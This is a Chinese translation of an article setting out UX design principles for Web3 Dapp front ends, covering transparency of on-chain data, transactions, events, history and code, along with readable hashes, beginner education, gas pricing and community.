➤ 🌀 明确该历史记录存储的位置(在本地或者服务器上) (∞>章节:5.代码的透明度)

➤ 🌀 提供用于导航、搜索、导出和删除历史记录缓存的工具

— 怎么做 >的示例

5——(代码&环境)代码的透明度

➤ 🌀 明确正在使用哪种区块链

➤ 🌀 明确读/写操作中使用的智能合约的地址

➤ 🌀 明确哪些代码是开源的(以及在哪里可以找到)

➤ 🌀 明确代码运行的位置 (本地还是远程服务器)

➤ 🌀 明确 web3 提供者 / 区块链节点 (本地节点、Dapp 受控节点, MetaMask, Infura等)

➤ 🌀 明确 Dapp 是在主网还是在测试网上运行的

➤ 🌀 明确哪些数据来自数据库或受到数据库的影响(∞>章节:1.数据来源的透明度)

➤ 🌀 允许 DIY 的代码执行:允许高端用户查看正在运行的代码并能够自己通过命令执行程序

➤ 🌀 明确智能合约所需的输入

— 怎么做 >的示例

////通用 Web3 用户体验原则

6——时间/等候管理

➤ 🌀(管理用户的期望)说明区块链的具体时间并在不同阶段管理用户的等待时长。

➤ 🌀(管理等待的时间)在等待时间内在指示器上实时显示(等待时长)

— 怎么做 >的示例

7——人类可读的哈希格式

➤ 🌀 出示一个简洁的哈希版本但始终显示初始部分和结束部分

➤ 🌀 如果你需要一个更简短的版本,最好选结尾部分而不是开头

➤ 🌀 总是在前面加上“0x” 以表明它是一个哈希值

➤ 🌀 允许用户扩展完整的地址/哈希

➤ 🌀 允许用户很容易就能复制它

➤ 🌀 尽可能的情况下,使用缩写词作为标题,使用缩写地址作为副标题

➤ 🌀 如果可能,允许用户轻松地将惯用的可读名称或文本与地址和哈希相关联

➤ 🌀 如果可能,将哈希的某种确定性视觉表现(比如标识符、方块等)与地址关联起来

8——永远的新手模式

➤ 🌀 通过正常的互动编排教育信息

➤ 🌀 提供2个或更多级别的教育内容:区块链基础知识和 Dapp 特定术语

➤ 🌀 最小化用户需要学习的新事物和概念的数量,并逐步增加

➤ 🌀 如果可能或与之相关的话,提供“专家的解释”加快学习

➤ 🌀 应保持交互的紧凑感(Don’t loose context)

— 怎么做 >的示例

9——Gas价格和交易撤销

➤ 🌀 说明什么是 Gas 和 Gas 价格(和其他术语条目一样 ∞link 8. 新手模式)

➤ 🌀 推荐 Gas 价格范围并说明其上限和下限的大体时间

➤ 🌀 尽可能展示转换为法币的 Gas 价值

➤ 🌀 允许交易撤销

//// DDP(Decentralization Design Principles):去中心化设计原则

10——社区感

➤ 🌀 说明有多少人在这个社区之中

➤ 🌀 根据合适的分类,将社区成员归类

➤ 🌀 说明社区的组成成分(比如,社区里面的分组以及他们在社区里所占的分量)

➤ 🌀 如果有的话,阐明这个项目的愿景,以及用户如何能够参与其中为这个愿景的实现作出贡献。

— 怎么做 >的示例

11 —未来可以探索的设计原则

➤ 🌀 身份和名誉

➤ 🌀 治理

➤ 🌀 钱包

➤ 🌀 交易所

➤ 🌀 首次代币发行 & 代币售卖机制

➤ 🌀 代币机制设计

下一步

TTT (Trust Through Transparency Design Principles): 透明带来信任的设计原则

Web3 假设:

– 如果你不知道在哪里查看以及如何查看,那么它就是不透明的。

– 如果它是不透明的,那么它就是不可信的

每一个人,包括他们的长辈,都在聊区块链如何做到“无信任”和“透明”

为了解释为什么这两个假设只是部分正确,我们需要用一篇长一点的内容来指出这里面一个错误。

在程序层面,我们几乎可以明确这一点是正确的,因为软件验证数据。但是当你面对终端用户体验的时候,这两个假设就分崩离析

此外,很多 crypto 项目和 Dapp 的前端很少向用户展示他正在交互的智能合约的地址或数据的来源,目前来看对于一个非技术用户,想让他们理解这些信息或者如 Etherscan 这样的独立区块链浏览器的运行机制非常艰难,甚至有点不可能。

现在能够部分由用户控制的仅仅是中介钱包记录了能在前面提到的区块链浏览器中检查到的交易的哈希时间。

因此,如果是一个用户,特别是非技术类型的用户,不能通过用户界面识别这是一个 Dapp 还是一个普通的 web 应用的话,或者也不能验证他看到的或者交互的内容是和区块链相关的,那么他将不会感受到区块链应提供的无信任和透明度。

在 TTT 这个类别的 Web3 设计原则中提出了一个彻底透明的方法,能够让任何 Dapp 的前端用户,甚至是非技术类型的用户也能够完全感知到数据的来源,理解交易的发生和执行,并最终能够信任他们面前的代码和服务。

————————以下开始正文阅读————————

1-(数据读取)数据来源的透明度

最好是只需通过查看页面,用户就能够分辨某个数据点或内容是真实存储于区块链中的,让用户猜测会造成用户体验的不友好,并且让他们假设所有看到的数据都是在链上也是不够的。

这个要求对于如分布式交易所这样的数据密集型的 Dapps 可能有一些奇怪,但是我在下面会举例子来展示一些解决方案。

🔑🔑原则🔑🔑

Dapp前端准则:

➤ 🌀 阐明哪些数据来自区块链,哪些数据不是

➤ 🌀 阐明智能合约的地址

➤ 🌀 将所有涉及到的区块链数据链接到独立的区块链浏览器

➤阐明哪些数据来自数据库(∞>章节: 5.代码的透明度)

怎么做 >的示例

使用css更改颜色/字体/形状以清楚地区分区块链数据,并在整个项目中保持一致并始终使用相同的“区块链颜色”

  • 使用可外链的链接:

当悬停或单击区块链数据点时,你可以提供一个内容扩展的提示,其中包含有关数据点的更多信息,该信息应明确区块链上的哪些位置可以找到数据。

上下文可扩展引用的示例

  • 使用链接图标管理样式冲突:

如果一个数据点既是“区块链数据点”又是指向 Dapp 某处的链接,则有两种方法可以解决双重操作:

1-添加一个链接图标,一个跟随任何“区块链数据点”的图标,该图标提供可扩展的参考功能,同时保持链接的正常工作。

2-打开可扩展引用并在其中插入辅助链接(但需要考虑到这会产生更多摩擦,因为您要求用户执行 2 个操作而不是 1 个操作)。

打开上下文引用的链接图标示例。这是为了将链接视图功能添加到 Dapp 中的某个链接

  • 使用“链视图”模式和/或侧面板

对于像去中心化交易所或市场信息展示这样的数据密集型界面,遵循之前的建议可能意味着对大部分界面进行样式化,可能会更加混乱。要解决此问题,您可以设想一个“链视图”按钮,当悬停或单击时,会暂时设置数据样式。这就像在页面上放置一个过滤器,一个帮助用户查看哪些数据是区块链数据点的过滤器

延伸一下这个想法,“链视图”也可以是一个侧面板,可以托管 Web3 设计原则中描述的许多功能。在这种情况下,Chain-View 面板可以具有上述选项来打开或关闭区块链数据点的可见性。在接下来的示例中,我们将看到 Chain-View 面板的更多用途。

  • 清楚地显示哪些链接打开外部区块链浏览器

如果链接要将用户转移到另一个页面,最好通过以下方式控制用户的流程:

1 – 添加一个说明按钮,说明将要发生的事情:即“在Etherscan中打开”

2 – 为独立的区块链浏览器添加链接图标,并在 UI 中保持一致地使用它

-(写入数据)交易的透明度

用户需要知道数据将被写入区块链,特别是当它需要交换经济价值(加密货币或代币)时。即使钱包确实提示了用户这个意图,Dapp 也应该在向钱包启动交易请求之前澄清这一点。

交易类型

在与区块链交互时可能会发生不同类型的交易,每种交易都会产生不同的后果

用户应该能够通过用户界面在不同阶段(甚至在启动交易之前)提供的信息来区分它们。

2.1 – 价值转移

— 2.1.1 – ETH

— 2.1.2 – Tokens(代币)

2.2 – 函数调用

– 2.2.1 – 具有价值含义的合约方法

– 2.2.2 – 没有价值转移的合约方法

2.3 – 工厂:合约生成功能

交易数据和成本

交易通常具有“有效负荷”,一些附加信息,例如传递数据给合约,并且通常用于写入或计算在区块链中写入的内容。

此外,向区块链写入数据通常会产生成本,即支付交易的“gas fee”。

用户应该了解这两个信息并理解其内容。

🔑🔑 原则 🔑🔑

Dapp前端应该这样做:

➤ 🌀 [不可篡改] 明确操作是不能够篡改的

➤ 🌀 [价值] 明确操作涉及金钱或价值

➤ 🌀 [隐私性] 明确可能会需要用户验证的操作

这是最难实现的原则之一,因为任何写入数据都有可能让用户被识别出来(除非使用ZTKSnarks-零知识证明),作为智能合约和 web3 开发人员,我们可能不了解仲裁工具当前和未来的复杂性,这通常也是闭源解决方案,如果隐私是你的 Dapp 的主要特征,请考虑这一原则,并使用它来指导设计,选择何时明确哪些行为会导致想获得隐私保护的用户会面临风险。

➤ 🌀 [工厂] 明确哪些操作会以用户的名字产生新的合约

此原则仅适用于帮助用户创建与其地址作为消息创建者的合约 Dapp。特别适用于运行在主网上的应用。

所有交易的指南如下:

➤ 🌀 明确并提前确认新的未来状态

➤ 🌀 以人类可读的格式和智能合约要求的方式显示正在用于交易的数据

(∞>章节:5.代码的透明度)

➤ 🌀 明确Gas价格的建议值以及如何覆盖掉交易(∞>章节:9.Gas价格与交易撤销)

➤ 🌀 管理交易等待时间 (∞>章节:6.时间/等候管理)

➤ 🌀 记录交易后,向用户显示交易的相关摘要以及如何访问历史记录 (∞>章节: 4.用户交互历史记录)

➤ 🌀 可能的话, 澄清哪些行为不是交易行为,所以它是安全的

怎么做 >的示例

  • 使用css表示所有不可逆转的行为

也许使用像红色这样的警告/高亮颜色

  • 添加一个微小的书面警告和按钮

如:注意不可逆转的行动>了解更多

  • 使用双重确认:

在用户按下按钮之后和调用钱包/ MetaMask之前打开弹出窗口或提示,您可以在其中通知用户所有的含义并要求确认。

也需要为用户提供:

—取消动作选项

— 从不再显示这些弹出窗口(因为她是专家用户),如果你的 Dapp 这样做时请告诉用户她最终可以在 Chain-View 侧面板中重新激活该功能

  • 标明并预预测未来预期的步骤

无论是使用简单的书面描述,标签字幕,还是使用向导都需要有更多步骤来完成动作

在向导的情况下:

—  清楚地向用户显示后续步骤的编号和标题

—允许用户查看下一屏,以了解正在发生的事情以及将要发生的事情(∞>章节:8.新手模式),虽然你也应该将功能灰化,以免混淆她可以通过实际操作可以看到所有的内容。(用户可以预览所有需要的步骤)

  • 向 Chain-View 侧面板添加选项

侧面板可以是显示许多这些警告的地方,也可以为交易提供检查,定义包括: — 交易类型

—交易相关信息

— 燃料费

—其他相关信息 (∞>章节:5.代码的透明度)

3 -(数据推送)智能合约事件的透明度

事件是 Web 3时代里的通知

(以太坊)智能合约可以发出既可以用于在区块链中存储日志的事件,又可以通过Javascript被动地通知 Dapps 前端已发生的事情。

了解事件非常重要

— 可以有参数,信息添加到日志

— 永久存储在区块链中,因此可以被搜索

开发人员通常会使用事件来处理各种事情,例如在满足特定条件或发生特定操作时发出信号: 比如当新用户已成为令牌持有者,已存款,或已从预言机收到数据等等

可以搜索事件的对于记录一个特定 Dapp 的行为,并且了解自 Dapp 创建以来成千上万的区块中发生了什么以及何时发生的事情非常有用。

为了更好地理解为什么这么重要,让我快速告诉我个人的故事

当 DAO 在2016年遭到黑客入侵时,我有机会与小组合作解决这个大问题的一部分:了解谁从 ExtraBalance 帐户中欠了多少以太。

当用户在 ICO 期间购买 Dao Tokens 时,根据费用表,不同数量的以太将进入

ExtraBalance。

该团队的两名问题解决者 Nick Johnson 和 Bokky Poobah 使用了“CreatedToken”事件,用来跟踪与 DAO ICO 相关的所有交易

我走的是“硬路线”,想象一下事件没有实现的情况,并为区块链开发了一个确定性的解析器 ,一个取证工具,对于恶意或计划不当的智能合约非常有用。我这样做也是因为没有像“Received By ExtraBalance”这样的事件来查明交易的那部分。

这里有趣的地方:虽然他们的脚本需要花费几个小时,但我的脚本需要一天或更长时间;这是因为我不得不遍历(重新执行)区块链中的每一笔交易,而由于事件日志,他们已经可以访问(几乎)“正确”的交易。

即便如此,我们三个人花了大约两个月的时间来调和这些数字并将整个余额归还给原来的所有者。

这与Web3设计原则有什么关系?

开发人员随意的使用事件:他们可以选择要不要输出一个事件来表明这对他们的 Dapp 有重要意义。将访问在智能合约中的事件的权限交给前端用户是能够让类似 Dao 事件中这样的决策变得更透明。

高水平的有用事件可以成为透明智能合约和 Dapp 的标志,因为它们不怕让你知道它内部的运作。然而很少甚至没有事件可以成为草率甚至恶意智能合约的标志。

正如上面的 DAO 故事一样,缺乏事件会迫使用户开发自己的确定性区块链解析器来理解内部发生的事情,这也是一项实际上不可能完成的任务,因为她需要一个档案节点。

此外,事件对于开发人员来说非常有用,可以创建多种类型的分析,通知和响应数据源,甚至可以独立于智能合约所有者/创建者。或许,前端用户也应该可以在不用写代码的情况下访问此功能。

Web3假设:

— 如果需要大量的努力来查找,查看和验证数据,那么它就不是透明的

 —如果让99%的用户望而却步,那它就是不透明的 [2]

🔑🔑 原则🔑🔑

Dapp前端应该是:

➤ 🌀 标明并使最终用户可以访问所有事件,即使它们仅用于开发者目的

➤ 🌀 关联应用: 仅显示与当前用户相关的信息的通知消息,但仍允许用户在单独的界面中检查所有事件

➤ 🌀 允许用户订阅,取消订阅或暂时静音某些事件

事件是特定于合约的,因此这些是可能实现的简单建议:

此外,这些想法可以通过外部工具,服务,插件或库更好地解决,这不需要Dapp前端开发人员将所有这些“非核心”功能实现到他们的Dapp中。

怎么做 >的示例

  • 有一个用户可以访问的通知中心,这可能是“链视图”侧面板中的一个部分
  • 为重要的消息使用弹窗
  • 创建过滤器以选择/取消某些事件或基于某些参数自定义通知。这些过滤器可以是:

    —如果它包含以太/代币

    — 基于地址(我的/用户或其他地址或地址)

    —在某个时间段或某两个区块之间

    其他等等

-(历史)可访问、透明的用户交互历史记录

未来,我们每个人可能需要和数百或数千个 Dapp ,通证和区块链进行交互,因此,用户可能有去清晰地记录每一次交互的历史日志,以供未来参考的需求。

目前钱包已经可以用来存储所有交易的历史记录,这是一个开始,但是钱包一次只能用于一个帐户,因此当你使用多个账户进行操作的时候就行不通了。

此外,除非加入额外的功能,否则目前钱包仍然很难筛选出某个特定的Dapp。

对于Dapp来说,肯定是需要方便地帮用户记住每次交互历史的,这个就像你使用普通的应用时,可以查看购买过的历史记录一样。

更重要的是,分布式交易所和 Dapp 可能会让每个用户生成数百或数千笔交易。所以记录交易历史非常重要。

🔑🔑 原则 🔑🔑

一个Dapp的前端应该是这样的:

➤ 🌀 提供一个特定地址的所有交易历史

允许用户检查所有与智能合约(可能主要是类型2)进行过交互的交易,这些交易被写入了区块链并因此修改了交易状态

➤ 🌀 明确历史记录存储的位置

为用户提供历史记录可能意味着在数据库上(远程服务器上或者最好是在用户的本地 indexDB中)记录她的交易哈希(Transaction Hashes)。这当然是潜在的隐私风险,因此请注意隐私原则(∞>章节:2.交易的透明度)和代码透明度原则(∞>章节:5.代码的透明度),以向用户说明存储此数据的位置。

➤ 🌀 提供用于导航,搜索,导出和删除历史缓存的工具

怎么做 >的示例

  • 类似于事件通知中心,可设计一个用户历史选项卡或专门的页面,可以在链视图(Chain-View)侧面板内
  • 可设计一个用于筛选不同类型交易的功能(比如eth,通证,函数调用,相关合约生成等类型)
  • 可以通过日期筛选交易,比如从开始或者限定前后日期进行筛选
  • 用户友好的可选附加功能:用户可以在交易中添加非链注释字段,比如为了有可读可搜索的明文,可设置一个简单的提醒。
  • 可选项:如果需要有几百个交互并且和 Dapp 相关的话,设计一个搜索框比如,去中心化交易所可能想要添加让用户可以搜索某个特定代币的交易的功能
  • 导出:允许用户选择性地导出 csv 中的数据,并通过其他方式进行探索,这个情况尤其适用于数据量大的时候
  • 删除:允许用户从本地缓存中删除历史记录,但是要申明,真实交易历史记录既没有从钱包也没有从区块链中被删除
  • 导入只有当Dapp允许用户为每笔交易添加自定义注释时这个导入功能才是合理的,否则从区块链上更改信息就变得轻而易举了。

5 -(代码&环境)代码的透明度

如果可以信任某个Dapp,也就意味着可以信任正在执行的代码。为了获得信任,Dapp代码的所有方面都应该尽可能地保持透明。

Web3假设

 – 一个 Dapp 要获得信任,它的代码必须是可信的

 – 可信任的代码,它需要透明,可被独立执行和验证

🔑🔑 原则 🔑🔑

一个Dapp的前端应该是这样的:

➤ 🌀 明确使用的是哪条区块链

在 Dapps 激增的情况下,显而易见的一个事实是,很多 Dapp 我们不知道运行在哪条链上,或者在不同链上运行了不同的版本。此外,对于 Plasma,Polkadot,Cosmos 等其他扩容方案来说,Dapp 可能在它自己的子链中跟踪交易,这个子链可能深深嵌套在其他的 Plasma 链或其他的 parachain 或者 Cosmos Zones 或 Hubs。应该让用户知道他们自己的数据写在哪里,也因此能够清楚一些技术参数(比如安全性,速度等)以及去哪里独立验证这些数据。

➤ 🌀 明确用于阅读和写操作的智能合约地址

以及链接到独立的区块链浏览器 (∞>章节:1.数据溯源的透明度)

➤ 🌀 明确哪些代码是开源的以及能在哪里找到

➤ 🌀 明确运行代码的位置(本地 vs 远程服务器)

这一点可能在视觉呈现上会有些困难和笨重,但如果部分代码需要运行在某个服务器的话,那么至少要有一个页面解释运行的是哪一部分,是为什么,并且在任何一个相关部分的用户页面中指出。

如果已经设计了原则一(∞>章节:1.数据溯源的透明度)中的示例链视图模式,那么还可以加上其他的视图。

➤ 🌀 明确web3的提供者/区块链节点(本地节点,Dapp 控制节点, Infura,MetaMask 还是其他节点)

为什么?因为增加了某些设置的节点可以记录数据,比如 etherscan,并且可能成为用户隐私风险的来源。

-如果可能或相关,允许用户切换到自己的节点

虽然已经有像 MetaMask 这样的提供商提供此功能,但是这个原则适用于当你的 web3 Dapp 由于某种原因确实向特定节点广播事务的情况(并且这个广播可能带来一些风险)。此外,通过自己私有节点执行的交易可以更快地执行,因为这样可以避免公共节点可能需要排队的情况,尤其是像在众筹这样的高需求事件期间。

➤ 🌀 明确Dapp是运行在主网还是测试网上

虽然 web3 提供商已经提供此功能,但特别要确保用户清楚他的操作是在主网中还是在测试网中运行(也可以使用其他原则 >2.交易的透明度)

➤ 🌀 明确从链上读取的数据中哪些是来自数据库或者是受到数据库影响的

对用户友好的附加功能

➤ 🌀 允许DIY代码执行

允许更高级的用户在发送之前查看交易函数的调用,以便他们可以验证它并通过命令行自行重现该操作。

这似乎有点夸张,因为 Dapp 前端本应该简化用户的操作,并隐藏某些技术细节,但是一个持怀疑态度/偏执的用户可能会想要验证单笔交易:如果说区块链就像一个分布式数据库,那么用户就应该能够在 Dapp 仍然工作的状态下独立执行写入操作。

若是希望代码极度公开透明,那么一个有此功能的 Dapp 应该具备“不要信任,而是验证”的标志:

https://blog.wizsec.jp/2018/02/kleiman-v-craig-wright-bitcoins.html?m=1

数据来源的增强版本,用户在这里还可以复制粘贴代码以自行恢复数据

➤ 🌀 明确智能合约所要求的输入

智能合约通常需要包含大量带零的很大的数字,这对用户不友好,特别是它很容易造成代价高昂的错误。 一般来说,Dapp 的 UI 设计会简化用户的这一流程,允许较小的数字以更易于理解且更不容易出错的范围出现,比如从 0 到 100。但是,鉴于前面所说的代码透明度的原则,应该让用户清楚地了解这些被 UI 简化的输入内容的所在地,并明确在智能合约中期望的实际输入,特别是使用在 DIY 代码检查器的时候。

在与Jorge Izquierdo 讨论 Aragon Voting 的应用程序时,有一个令人困惑的真实案例。开发人员可以使用针对该案例的相同的解决方案,并向用户说明一些示例:简单的数字,科学记数法和智能合约期望的(带所有 0 )的实际输入。

来自 Aragon wiki 的案例细节

怎么做 >的示例

  • 设计一个“代码透明度”的专有页面,就像是服务条款或隐私政策页面一样总是可以访问
  • 可以从多处链接到你的 github 仓库
  • 在“链视图”中增加一个专门用于显示代码透明度的部分,里面可以加入下面几项内容:1、关于此类内容的信息:

    — 正在使用的区块链

    — 使用的区块链的属性,尤其是平均区块的确认时间(∞link6.时间 / 等待管理)

    — 是主网还是测试网

    — web3 提供者(并且可以转换)

    — 智能合约地址

    — 类似于合约 ABI 的简化版本,只给出可被代码实际调用的方法

    —是否有部分代码不是在本地运行的(给出文本解释和动机)

    — github 仓库的链接

    2、开关,筛选或选项:

    —  基于图标和/或通过更改颜色显示,哪些部件/组件拥有在服务器上处理的数据 — 使用(“从云段到链”的数据库)链接图标和/或通过改变颜色显示,哪部分数据来自于数据库

    — 如果可以,提供更改 web3 的提供者的选项

    — 交易预览,可以通过复制和执行命令行上的函数来调用

    如果相关,可以提供输入注释。

代码透明度面板及其相关信息的案例展示

通用的 Web3 用户体验原则

下面的原则并不会直接于透明度和无信任的特性相关,而是会着眼于解决其他一系列用户体验问题,这些问题来源于常规的使用和基于区块链的分布式应用的实现。

– 时间/等待管理

交易是异步的,在可扩展性问题得到解决之前,由于区块链基础设施不完善和当前网络的拥塞状况,交易有可能很长时间之后才能被处理并得到充分确认。

一个精心设计的 Dapp 需要明确这些信息并管理用户的等待(预期),直到用户的交易得到确认。

🔑🔑 原则 🔑🔑

一个 Dapp 的前端应该是这样的:

➤ 🌀 (管理用户的期望)在每次交易时明确底层区块链的平均区块确认时间和当前的网络拥塞状况

➤ 🌀 (管理等待时间)在等待时间内实时显示当前状态

怎么做 >的示例

对于一系列的用户体验事件,一个 Dapp 应该

  1. 解释 gas 的选择将如何影响他们的等待时间(∞>章节:9 gas价格和交易回滚)
  2. 显示和链相关的特定时间的警告
  3. 显示进度或等待图标直到被解决
  4. 如果事情需要比正常情况更长的时间,要给出反馈,潜在原因和/或解决方案。比如:“这比预期花费的时间更长。该网络目前处于拥塞状态。

    以下是您的选择:

    – >等待至少X秒/分钟

    – >添加更多 gas 以加速交易

    – >完成后通知我”

  5. 告知用户:任何执行,如果成功,都会通知用户。
  6. 一旦操作完成,通知用户成功执行的报告。该报告中包含他们可以独立验证的数据(如交易哈希)

7– 人类可读的哈希格式

在名称注册服务被广泛应用之前,甚至即使它已经被广泛采用,我们也必须解决长地址和交易哈希所带来的困难。

这些只是关于如何增加他们的可读性同时完整保持信息透明度的一些想法。

🔑🔑 原则 🔑🔑

一个 Dapp 的前端应该是这样的:

➤ 🌀 显示哈希值的压缩版本,但始终显示开始和结束的部分

即:0xABCD…EFGH

但请注意,这可能有安全问题,因为类似上面的“靓号”地址生成器可以在大约1周内生成给定8个字符的序列。

➤ 🌀 如果你需要更短的版本,请保留开头而不是保留结尾

即:使用 0xABCD… 而不是 0x…EFGH(译者按:这一段原本作者删掉的是正确的,后来他改正的反而是错误的,我翻译了作者删除的那一段

➤ 🌀 每4个字母分隔好于每3个字母

即,使用0xABCD …而不是0xABC …

➤ 🌀 总是在前面加上“0x”来表示它是一个哈希值

➤ 🌀 允许可以看见完整地址的可选视图

➤ 🌀 允许用户轻松复制地址

➤ 🌀 在可能的情况下,使用速记词作为标题,缩写地址作为副标题

➤ 🌀 如果可能,创建一个系统以允许用户轻松地将自定义的人类可读的名称或文本与地址相关联

这些标记应该本地存储在用户的计算机上而不是存储在服务器上(借助于∞>章节:5 代码原则的透明度)

如果存在,请借助已知别名数据库(如 ENS 注册提供商或 Etherscan )来获取已知合同和地址。

 - 永远的新手模式

如果我们想要大规模采用分布式应用程序,那么我们需要使得大量的没有任何技术知识,也不了解区块链及其术语的人进入该领域。

和其他领域的不一样的是,这里不仅是需要一些教学,也是处于安全原因(处理私钥),而且还需要完全理解为什么区块链的特性是如此地具有革命性,以及 Dapp 与其他应用程序的区别。

同样重要的是,这个领域非常奇妙,通常需要新的心理模型和跨学科理解:价值网络正在创造数千个受市场动态影响的通证化生态系统,研究这些生态系统通常需要经济学,金融学和博弈论; 大多数人不太可能精通甚至未曾接触过这些学科。

因此,分布式应用程序应该从各个方面做出努力去教育新老用户。

大多数前面的原则都考虑到了新手用户,但仍有一些事情需要开发人员考虑。

🔑🔑 原则 🔑🔑

一个 Dapp 的前端应该是这样的:

➤ 🌀 在日常的互动中穿插进区块链的知识

Nick Neuman 非常好地总结了 Dapp 设计者的主要任务(https://medium.com/@nickneuman/keysplit-private-key-security-for-cryptocurrency-owners-d1653ea9631d):“一个好的用户端应用程序将把教学融入到产品体验中。 这意味着以简洁有趣的方式解释用户在做某事时的原因,然后构建产品,这样用户就很难做出不安全的事情。”

➤ 🌀 提供2个或更多级别的教学内容:区块链基础知识和 Dapp 相关术语

这不仅仅是一个新手加入时的原则,对所有应用程序,特别是对那些具有内部术语、语境术语或者独特机制的应用程序来说,另添加一层教学是一种很好的做法。即, 如果你正在构建一个 token 基金管理应用,请不要假设您的用户知道金融等每个术语的含义; 相反的是,应教育他们去了解区块链的基础知识和金融的基础知识,至少要了解你正在使用的词。

➤ 🌀 最大限度地减少并逐步增加用户需要学习的新事物和概念的数量

区块链项目尽管采用了 token 化的的激励措施,仍然必须面对任何软件服务都需要经历的正常的摩擦和流失:用户将选择更简单的替代方案,特别是当 Dapp 对用户要求太多的时候。 因此,Dapp 在向新用户提供教学内容时,特别是在公共的页面(即主页)中,应尽量减少新词和新概念的使用,并逐步在参与用户的页面(即用户的仪表盘)中显示更多学习内容。 这也可以通过其他方法来实现:使用更简单的语言,避免使用术语,并使用类比来利用用户可能已经熟悉的知识来解释复杂的新信息。举一个例子:看看 Spankchain 如何通过创造卡的概念去避免解释支付渠道就知道了(https://youtu.be/qBqnD6_uRGM?t=1026)

➤ 🌀 如果可能或相关,提供“专家解释”以加快学习

揭示你的 Dapp 功能的含义,它们如何相互作用以及专家会如何评价。

对特定事物,专家会知道些什么?他们将如何解释数据?他们将如何采取行动?他们会做出什么选择?

这些问题的答案,如果相关的话,可以作为 Dapp 用户界面中的建议。

例如,预测天然气价格(∞链接9 Gas价格)或者指示交易特定 token 的时机(仅举例)。

➤ 🌀应保持交互的紧凑感(Don’t loose context)

尝试组织界面内的片段,通过可以被轻易关掉的临时弹出窗口,或者在另一个选项卡中打开更详细的信息。在学习时,允许用户快速并“就地”学习,而无需更改页面放松对用户行为的追踪。

怎么做 >的示例

  • 为所有的命令添加副标题(并参考其他原则来预测将要执行的交易∞>章节:2 交易透明度)
  • 设置学习模式

添加到“链视图”或用户界面的其他部分。一个可以通过打开和关闭来启用或禁用学习功能的开关(一个“通用的疑问标记”按钮)

  • 词汇表弹出窗口

使用字典中提供的术语时,显示单词后面的链接图标。如果单击或滑动图标,则显示带有指定信息的上下文弹出窗口

在某些情况下,弹出窗口还应提供机会去“了解更多”。这将在词汇表选项卡中已打开的“链视图”中打开另一个选项卡或侧边栏。

  • 词汇表页面

在链视图或其他页面中,Dapp 应该提供一个页面包含所有区块链和 Dapp 特定的术语。这些术语是本身在 Dapp 中使用的或需要了解其机制的。此页面应从词汇表弹出窗口中链接过去,而不是直接给出链接。

  • 在任何向导中,能够快速前进到后续步骤是很聪明的做法。这样你可以看到即将发生的事情,尽管在完成前面的步骤之前,所有布局都应该显示为灰色并禁用。对于任何用户界面而言,这都是一个很好的原则,不仅仅是 Dapp。

–  Gas 价格和交易回滚

gas 是新手最容易混淆的事情之一。即使这个名字很生动,但是因为用户通常使用的服务基本上都是免费的,他们很难想象计算需要成本。

更重要的是,当用户第一次遇到 gas 时,他们不知道如何定价,因此也不知道 gas 的价格怎样选择比较好。

即使现在几乎所有情况下 gas 都是由发出交易的钱包处理的,但这个原则对于钱包设计师和所有需要或要求用户选择 gas 价格的 Dapp 来说仍然有效。

幸运的是,开发人员可以使用像 Ethereum Gas Station (https://ethgasstation.info/) 这样的工具,它提供了一个方便的API。

🔑🔑 原则 🔑🔑

一个 Dapp 的前端应该是这样的:

➤ 🌀 明确什么是 gas 以及 gas 价格

(就像任何其他的术语 ∞>章节:8 新手模式)

➤ 🌀 建议一个合理的 gas 价格范围,并明确该范围的上限和下限的大致出现时间

这些是和当前网络拥塞状况相关的功能,因此最佳的解决方案是通过查询当前 Ethereum Gas Station 的API

(https://ethgasstation.info/json/ethgasAPI.json) 来给出范围界限的建议。

重要的是向用户说明这是基于时间的建议,并且建议的值可能在将来随着时间发生变化。

➤ 🌀 可能还需要显示转换为法币的 gas 价值

➤ 🌀 允许交易回滚:如果用户发送的交易 gas 价格过低,应该向用户说明

(∞>章节:6 时间/等待管理)

-tx发送后无法取消

唯一的解决方案是使用相同的 nonce 和更高的 gas 价格发送另一个交易。

>因此需要提供自动恢复交易 nonce 并以更高的 gas 价格发送交易的选项。

DDP – 去中心化设计原则

去中心化是一种新的、强大的全球化形式。

它有可能成为历史上第一次被大量围绕无国界思想的自我主权者,自我管理的组织和分布式市场系统领导的应用。

这些设计原则仅仅想开启这个话题,来思考如何让用户感知到自己属于一个社区、并且属于一个高于自身的东西。(something bigger than themselves)

这些原则也仅仅是为了给开发者一些启发,从而他们能够开始从整体上思考他们设计的 Dapp 的功能。 而且这些全新的用户体验要求开发者需要在一个更广阔的维度思考我们正在建设的分布式社会

10 – 社区感

Dapp 和 App 的不同之处在于 Dapp 天生就是分布式的,即使一些服务是面向用户个人的,并且这些用户的交互是一种单机的体验,但是这些 Dapp 仍然是为了分布在世界各地的一大群人设计并使用的。

一种社区的归属感对于这些 Dapp 异常重要,用户需要感受到他们是和一个社区的产品、品牌紧密联系在一起的。

但是这并不意味着把 Dapp 建立成一个社交网络,虽然一些 Dapp 因为项目业务的关系在和社区聊天更紧密的整合中能够受益。那就更不用说,这种社区感对于一个分布式自治组织(DAOs)非常重要

可以参考下面这些通用的建议。在这些建议中我们用一些更开放的交互目标,能够让用户感知到他们是一个更大的群体的一部分。

🔑🔑 原则 🔑🔑

一个 Dapp 的前端应该是这样的:

➤ 🌀 说明有多少人在这个社区之中

➤ 🌀 根据合适的分类,说明谁是不同种类的成员

➤ 🌀 说明社区的组成成分(比如,社区里面的分组以及他们在社区里所占的分量

➤ 🌀 如果有的话,阐明这个项目的愿景,以及用户如何能够参与其中为这个愿景的实现作出贡献

怎么做 >的示例

  • 提供关于这个 Dapp 或者 DAO 中特定 token 持有人相关的数据或者用户数量的仪表盘

采用透明的原则来展示数据,特别在展示所有源于用户的、能够用于分析区块链的信息的时候,比如:

—代币财富分配

— 采纳时间图

—代币持有的起始时间和区块高度

其它等等

  • 在 DAO 中考虑加入各种可能相关的、可以获得的信息,比如:

— 用户的种类(比如加密猫中的育种者和非育种者,或者如 UJO Music 这样的音乐/艺术 Dapp 中的音乐家和听众,赌博的人和不赌的人等等。

—权益分布数据

—可能需要地理位置/时区相关的信息?

— 关于性别和年龄的信息。但是这仅当这些数据对社区有意义,并且它并不冒犯用户或让用户对 Dapp 的采纳产生反感的时候才可行。

  • 能够明显的搜索到合适并且和你的项目有关的数据类别:举例来说,我个人的意见是在 DAOs(分布式自治组织)中性别和年龄是无关信息,这些信息甚至会和创造一个无权、无偏见的社会的理念背道而驰,但是在一些如 SpankChain 这样的项目中这些信息是非常重要的。
